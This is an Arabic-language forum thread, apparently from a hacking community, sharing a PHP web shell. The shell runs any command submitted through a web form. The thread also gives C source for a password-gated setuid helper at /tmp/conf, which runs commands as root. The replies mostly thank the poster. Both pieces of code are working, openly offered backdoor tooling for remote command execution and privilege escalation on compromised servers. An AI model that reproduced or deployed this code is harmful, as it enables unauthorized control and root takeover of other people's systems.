PHP web-Sh3ll Ro0t للتطويــــــر !

[b]
السلام عليكم ورحمة الله

من الكود باين ++ مطروح للتطوير [/b]



<?php
$pass_suid = 'Inj3ct0r';
 
function hack_system($cmd,$pass_suid)
{
if(file_exists('/tmp/conf')){
system('/tmp/conf '.$pass_suid.' "'.$cmd.'"');
}
else{
system($cmd);
}
 
}
 
print
'<html>'.
'<head>'.
'<title>PHP web-Sh3llR00t v 0.1</title>'.
'</head>'.
'<body>';
 
if(!isset($_POST['cmd'])){
print '<form method="post">'.
'<input name="cmd" type="text" value="ls -la">'.
'<input type="submit" value="Go">'.
'</form><br><br>';
}
else
{
hack_system($_POST['cmd'],$pass_suid);
}
print
'</body>'.
'</html>';
?>


علما أن المسار /tmp/conf يكووون



#include
#include
main(int argc,char *argv[])
{
if(argc == 3){
if(strcmp(argv[1],"Inj3ct0r") == 0) {
setuid(0);
setgid(0);
system(argv[2]);
}
}
return 0;
}




فكرة جميلة و من الممكن اضافت هذه القطعة من الكود الى الشل ليتأكد من وجود ثغرة

شكراا لك يا عم خالد وش دورتهااا php ولا … ههه

والله مبدع

بارك الله فيك اخوي

Merci b1 3a al code Khaled…:wink:

[b]

ههههههه هوما كامل يتشابهووواااااا &&&& كامل كيف كيف - تقريبا - كي Perl كي Php :slight_smile:

شكرا على مررروووووررررركم جميييييـــــعــــــــــا :slight_smile:
[/b]

U are Welcome HamZa :slight_smile: :wink:

مشكووورين على مروووركم :wink:

بارك الله فيك اخي:)

وفييييك بركة أخيي :slight_smile: مشــــكووور عل المرووور

!!!


#include
#include

!!!
we mafehamna waloo

بارك الله فيك خيو سكريبت رائع

مافيه شي جديد!!